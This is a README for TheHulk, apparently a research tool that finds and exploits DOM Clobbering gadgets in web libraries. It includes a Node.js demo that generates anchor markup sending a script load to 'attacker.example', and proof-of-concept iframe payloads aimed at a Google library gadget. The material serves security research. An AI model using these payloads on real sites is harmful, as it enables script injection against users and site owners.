TheHulk
TheHulk is a dynamic analysis tool designed to detect and exploit DOM Clobbering vulnerabilities.
Overview
TheHulk operates in three phases:
- Gadget Detection with Dynamic Taint Analysis: TheHulk performs dynamic taint analysis in the browser to track dangerous dataflows at runtime for a given input URL.
- Exploit Generation with Symbolic DOM: using the taint traces recorded in the first phase, TheHulk collects and solves the constraints along each trace to generate DOM-clobberable HTML markup as exploits.
- Exploit Verification: TheHulk injects the generated HTML payload into the target webpage and hooks the dangerous sinks to verify that the gadget is actually exploitable.
Installation
To install TheHulk, follow these steps:
- Clone the repository, including its submodules:
git clone --recursive https://github.com/jackfromeast/TheHulk.git
- Run the installation script:
cd TheHulk && ./install.sh
- Install the mitmproxy certificate: to instrument HTTPS traffic with mitmproxy, you need to install mitmproxy's CA certificate in your system trust store and in your browser (for Chrome), so that the instrumented pages do not trigger untrusted-certificate errors. To do so, follow: https://docs.mitmproxy.org/stable/concepts-certificates/#:~:text=chrome
Keep in mind that trusting the mitmproxy CA system-wide lets anyone who obtains its private key intercept your TLS traffic, so do this on a dedicated analysis machine or browser profile rather than your daily-use system.
- Basic installation check:
./tasks/ae-run-basic-check/run.sh
Running
TheHulk can be run in two modes: as a standalone module or as a pipeline task.
Running TheHulk with Tasks
Tasks help you define the input, output, and configuration of an analysis task for better pipeline orchestration. A typical task directory includes the following components:
- input folder: holds the list of URLs for analysis.
- output folder: stores the analysis results for each site or page.
- callbacks folder: contains JavaScript-defined callback functions that the crawler invokes during execution.
- config.browser.yml: configuration file for the taint analysis engine.
- config.scheduler.yml: configuration file for the crawler.
- run.sh: entrypoint script to start the task.
For example, to detect and exploit the gadgets in the DOM Clobbering Collection, you can simply:
- Update the two configuration files located at tasks/ae-run-gadget-detection-e1:
  - 1-1. Update the WORKSPACE path to specify where the output folders will be placed.
  - 1-2. Configure the inputs, browser settings and callbacks if necessary (this can be skipped).
- Start the task:
./tasks/ae-run-gadget-detection-e1/run.sh
Running the Dynamic Taint Engine Only
Although TheHulk is designed to detect DOM Clobbering gadgets, its dynamic taint engine can be generalized to detect other client-side vulnerabilities. The source code of the taint engine is located at gadget-detection/runtime-analysis/src.
- Update the configuration file located at gadget-detection/browser/config.browser.yml:
  - 1-1. Update the WORKSPACE path to specify where the output folders will be placed.
  - 1-2. Configure the inputs, browser settings and callbacks if necessary (this can be skipped).
- Start the taint-aware browser:
./gadget-detection/run.sh
Note: You can adjust the '--force-device-scale-factor=1.75' argument in the configuration file to change the browser's scaling. This setting gives a comfortable size for reading source code in the developer tools, but it might be too large for viewing web pages; adjust it as necessary for your display.
Running the Exploit Generation Module Only
To generate DOM-clobberable HTML markup from a taint trace, run:
node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json
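The two phases that feed this command (gadget detection with a taint trace, then markup generation from the recorded path) can be sketched without a real browser. The following Node.js script is an added example and is not TheHulk's code: a Proxy stands in for window, any read of a global that does not exist becomes a "symbolic" value that remembers the property path read from it, a hooked sink spots such values, and the recorded path is turned into clobbering markup. The gadget function, the window stand-in, the sink hook and the marker scheme are all constructed for this example; the markup rules used are standard HTML behaviour (an element id creates a window named property, two matches yield an HTMLCollection whose named getter also matches name attributes and whose indexed getter follows tree order, and an anchor stringifies to its href). Paths deeper than two levels are deliberately rejected rather than guessed at.

```javascript
"use strict";
// Added example, not TheHulk's code: a toy, DOM-free version of the
// detection -> generation loop. Node.js only; no browser required.

const TAINT_OPEN = "\u0000TAINT:";
const TAINT_CLOSE = "\u0000";

// Symbolic stand-in for a global that does not exist on the real window.
// Property reads extend the recorded path; string conversion emits a marker
// carrying that path, so the taint survives string concatenation.
function symbolicValue(path) {
  return new Proxy({}, {
    get(_target, prop) {
      if (prop === Symbol.toPrimitive || prop === "toString" || prop === "valueOf") {
        return () => TAINT_OPEN + path + TAINT_CLOSE;
      }
      if (typeof prop === "symbol") return undefined;
      const key = /^\d+$/.test(prop) ? `${path}[${prop}]` : `${path}.${prop}`;
      return symbolicValue(key);
    },
  });
}

// window stand-in: real properties resolve normally; reads of undefined
// globals (exactly what an injected element with a matching id/name would
// satisfy) are treated as DOM Clobbering sources.
function monitoredWindow(realGlobals) {
  return new Proxy(realGlobals, {
    get(target, prop) {
      if (typeof prop === "symbol" || prop in target) return target[prop];
      return symbolicValue(String(prop));
    },
  });
}

// Sink hook: records every value reaching the sink that carries a taint marker.
function hookedSink(sinkName, trace) {
  return (value) => {
    const s = String(value);
    const m = s.match(/\u0000TAINT:([^\u0000]+)\u0000/);
    if (m) trace.findings.push({ sink: sinkName, source: "window." + m[1] });
    return s;
  };
}

// Constructed gadget (hypothetical), modelled on the common "read a config
// object from a global, fall back to a default" pattern.
function sampleGadget(win, setScriptSrc) {
  const cfg = win.sdkConfig || {};
  const base = cfg.baseUrl || "https://cdn.example/";
  return setScriptSrc(base + "sdk.js");
}

// Phase 1 (toy): run the gadget against the monitored window and report
// which undefined-global paths reached the hooked sink.
function detectGadgets(gadgetFn) {
  const trace = { findings: [] };
  const win = monitoredWindow({ location: { href: "https://victim.example/" } });
  gadgetFn(win, hookedSink("script.src", trace));
  return trace.findings;
}

const ESC = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" };
const attr = (s) => String(s).replace(/[&<>"]/g, (c) => ESC[c]);

// Accepts "window.X", "window.X.Y" and "window.X[n]"; anything deeper throws.
function parsePath(path) {
  const m = path.replace(/^window\./, "")
    .match(/^([A-Za-z_$][\w$]*)(?:\.([A-Za-z_$][\w$]*)|\[(\d+)\])?$/);
  if (!m) throw new Error("unsupported path: " + path);
  return { root: m[1], prop: m[2], index: m[3] === undefined ? undefined : Number(m[3]) };
}

// Phase 2 (toy): markup that makes the recorded path stringify to `value`.
// X    -> <a id=X href=value>
// X.Y  -> two id=X anchors (HTMLCollection), the second also named Y
// X[n] -> max(n+1, 2) id=X anchors, the n-th (tree order) carrying the href
function clobberMarkup(path, value) {
  const { root, prop, index } = parsePath(path);
  const name = prop === undefined ? "" : ` name="${attr(prop)}"`;
  const leaf = `<a id="${attr(root)}"${name} href="${attr(value)}"></a>`;
  const filler = `<a id="${attr(root)}"></a>`;
  if (prop !== undefined) return filler + leaf;
  if (index !== undefined) {
    const n = Math.max(index + 1, 2);
    return Array.from({ length: n }, (_, i) => (i === index ? leaf : filler)).join("");
  }
  return leaf;
}

// Detect, then generate an exploit for each finding.
function demo() {
  return detectGadgets(sampleGadget).map((f) => ({
    ...f,
    markup: clobberMarkup(f.source, "https://attacker.example/"),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node; the finding is window.sdkConfig.baseUrl reaching script.src, and the generated markup is the classic two-anchor pattern. The third phase is not modelled here: verifying a payload means injecting the markup into the real page and watching the hooked sink, which is what TheHulk does in its verification step.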
Example
Below is a screenshot of an analysis result for detecting a DOM Clobbering gadget in the Google Client API Library.
[Screenshot: https://github.com/jackfromeast/TheHulk/wiki/assets/moti-example.jpg]
The exploit generation output:
$ node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json -c exploit-gen/src/tests/motivating-example-conditions.json
====================
<embed name="scripts">
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
<form name="scripts"></form>
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
DOM Clobbering Collection
DOM Clobbering Collection is a list of widely-used client-side libraries with DOM Clobbering gadgets found by TheHulk.
The dataset is available at https://github.com/jackfromeast/dom-clobbering-collection.